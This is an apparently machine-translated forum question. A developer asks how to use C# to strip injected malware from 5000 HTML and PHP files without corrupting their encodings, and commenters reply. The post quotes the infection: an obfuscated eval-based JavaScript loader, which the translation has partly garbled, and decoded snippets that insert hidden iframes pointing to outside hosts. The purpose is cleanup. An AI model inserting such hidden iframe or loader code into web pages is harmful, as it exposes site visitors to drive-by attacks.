私は5000個のファイルを.htmlと.phpファイルとしてFTPからダウンロードする必要があります。私は各ファイルを読んで、ウィルスによってそこに置かれたいくつかのものを取り除き、それをFTPに戻す必要があります。C#でのエンコーディングを知らなくても、小さな変更を加えてファイルを読み書きすることはできますか?
私は、次のコードを使用しています:
string content;
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) {
content = sr.ReadToEnd();
sr.Close();
}
using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
{
sw.WriteLine(content);
sw.Close();
}
は、私は手でいくつかのファイルをダウンロードし、いくつかは
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />
を持っているが、私はそれらのすべてがそのようにしていると仮定したいとは思わないでしょう。私はメモ帳でチェックしました++といくつかのテキストファイルはANSIです。 PHPはUTF-8とHTML Windows-1250のようですが、修正しようとしている間にファイルを破壊しないようにしたいと考えています。だから、私はエンコーディングを知らない/推測する必要がなく、ウェブページからウイルスリンクを削除する方法があるのですか?
編集。 ; {document.rvwrew.vewr}キャッチ(q)をしてみてください{R = 1; C =文字列;}もし
VAR S =新 文字列():私はこのような何かを見つけて削除しようとしています(r & & document.createTextNode)u = 2; e = eval; m = [4.5 * u、18/u、52.5 * u、204/u、16 * u、80/u、50 * u、222/u 、49.5 * u、234/u、54.5 * u、202/u、55 * u、232/u、23 * u、206/u、50.5 * u、232/u、34.5 * u、216/u、50.5 * u、218/u、50.5 * u、220/u、58 * u、230/u、33 * u、242/u、42 * u、194/u、51.5 * u、156/u、48.5 * u 185/u、19.5/u、55.5 * u、200/u、60.5 * u、78/u、20.5 * u、182/u、24 * u、186 /u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51uu228/u,48.5*u,218/u,50.5*u,228/u 、20 * u、82/u、29.5 * u、18/u、4.5 * u、250/u、16 * u、202/u、54 * u、230/u、50.5 * u、64/u、61.5 * u、18/u、4.5 * u、18/u、50 * u、222/u、49.5 * u、234/u、54.5 * u、202/u、55 * u、232/u、23 * u 51 * u、228/u、48.5 * u、u *、u *、u *、u * 58 * u、232/u、56 * u、116/u、50.5 * u、64/u、57.5 * u、228/u、49.5 * u、122/u、19.5 * 49.5u、232.5u、232.5u、232.5u、232.5u、232u、232u、 56.5u、232.5u、232.5u、232.5u、232.5u、232.5u、232.5u、232.5u、 202 * u、232 * u、52 * u、224/u、19 * 51.5 * u、208/u、58 * u、122/u、19.5 * u、98/u、24 * u、78/u、16 * u、208/u、50.5 * 54 * u、202/u、30.5 * u、78/u、19.5 * u、98/u、24 * u、78/u、16 * u、230/u、 59 * u、210/u、57.5 * u、210/u、49 * u、210/u、54 * u、210/u、58 * u、242/u、29 * u、208/u、52.5 56 * u、222/u、57.5 * u、210/u、58 * u、210/u、55.5 * u 202/u、29 * u、194/u、49 * u、230/u、55.5 * u、216/u、58.5 * u、232/u、50.5 * u、118/u、54 * u、202 /u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5uu78/u 、51 * u、228/u、48.5 * u、218/u、50.5 * u、124/u、17 * u、82/u、29.5 58 * u、210/u、55.5 * u、18/u、4.5 * u、250/u、4.5 * u、18/u、51 * u、234/u、 220/u、16 * u、210/u、51 * u、228/u、48.5 * u、218/u、50.5 * u、228/u、20 * u、82/u、61.5 * u、18 /u,4.5*u,18/u、 50 * u、222/u、49.5 * u、234/u、54.5 * u、194/u、57 * u、64/u、51 * u、64/u、30.5 * 48.5 * u、232/u、50.5 * u、138/u、54 * u、202 * u、 52.5 * u、204/u、57 * u、194/u、54.5 * u、202/u、54.5 * u、202/u、55 * u、232/u、 232.5/u、232/u、58 * u、228/u、19.5 * u、82/u、29.5 * u、204/u、23 * u、230/u、50.5 * 19.5 * u、88/u、19.5 * u、195 * u、195 * u、195 * 51 * u、210/u、49 * u、202/u、57 * u、208 * u、58 * u、232/u、56 * u、116/u、23.5 * 218.5/u、23.5 * u、232/u、50.5 * u、218/u、57.5 * u、232/u、48.5 * u、232/u、23 * 54 * u、232/u、23 * u、224/u、52 * u、224/u、19.5 * u、82/u、 29.5 * u、204/u、 23 * u、230/u、58 * u、242/u、54 * u、202/u、23 * u、236/u、52.5 * u、230/u、52.5 52.5 * u、232/u、60.5 * u、122/u、19.5 * u、208/u、52.5 * u、200/u、50 * u 54 * u、202/u、23 * u、224のような、それぞれ、202/u、55 * u、78/u、29.5 * u、204/u、23 * u、230/u、 /u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55uu122/u,19.5*u194/u,49*u,230/u 53.5 * u、204/u、23 * u、230/u、58 * u、242/u、55.5 * u、216/u、58.5 * u、232/u、50.5 * u、78/19.5 * u、118/u、51 * u、202/u、23 * u、216/u、50.5 * u、204/u、58 * u、122/56 * u、122/u、19.5 * u、92/u、57.5 * u、232/u、60.5 * u、216/u、50.5 * u、92/u、 58 * u、232/u、57 * u、210/u、195 * u、19.5 * u、118/u、51 * u、92/u、57.5 * 52 * u、78/u、59.5 * u、210/u、50 * u、232/u、52 * u、78/u、 19.5 * u、82.5u、29.5 * u、204/u、23 * u、230/u、50.5 * u、232/u、32.5 * u、78/u、24.5 * 52.5 * u、196/u、58.5 * u、232/u、50.5 * u、80/u、19.5 * u、208/u、50.5 * u、 78/u、22 * u、78/u、24.5 * u、96/u、19.5 * u、82/u、29.5 * u、18/55 * u、232/u、23 * u、206/u、4.5 * u、18/u、50 * u、222/u、49.5 * u、234/u、54.5 * u、202/u、 33 * u、242/u、42 *、u *、u *、u *、u * 51.5 * u、156/u、48.5 * u、218/u、50.5 * u、80/u、19.5 * u、196/u、55。56 * u、224/u、50.5 * 5 * u、200/u、60.5 * u、78/u、20.5 * u、182/u、24 * u、186/u、 200 * u、202/u、50 * u、134/u、52 * u、210/u、54 * u、200/u、20 * (i = 0; i!= m.length; i ++)s + = mm(e( "m" + "[復号後
if (document.getElementsByTagName('body')[0]) { iframer(); } else { document.write(""); } function iframer() { var f = document.createElement('iframe'); f.setAttribute('src', 'http://fiberastat.com/temp/stat.php'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); }
ある
"+" I "+ ']'));試みる{doc.qwe.removeChild()}キャッチ(Q){E(S)}また、ウェブページにアクセスすると、これを(解読後に)伝えます。
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
スクリプトは、最後の3行に追加され、基本的には右</html>
VAR
後に開始されたPHPスクリプトは、ライン<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>
の多かれ少なかれ、このタイプを持っていますが、それは、ファイル内の任意の場所にすることができます。
これらのファイルを書き換える方法が他にあるかどうかはわかりません。しかし、5000個のファイルを通過する必要があります:-)
ファイルを変更している場合は、エンコーディングを知っている必要があります。そうしないと、実際にファイルを破損することが保証されます。 – Dave
ちょっと考えましたが、ウイルスがアップロードされる前に、アップロードされたオリジナルまたはバックアップのいずれかから、これらのファイルのクリーンなバージョンはありませんか?もしそうでなければ、それは前進することについて考えるべきことです。 –
いいえ、新しい顧客は今日私に連絡し、基本的に彼が持っているのは2種類のエントリを持つファイルの束だけです。私は 'problematic code'で質問を更新しました。 – MadBoy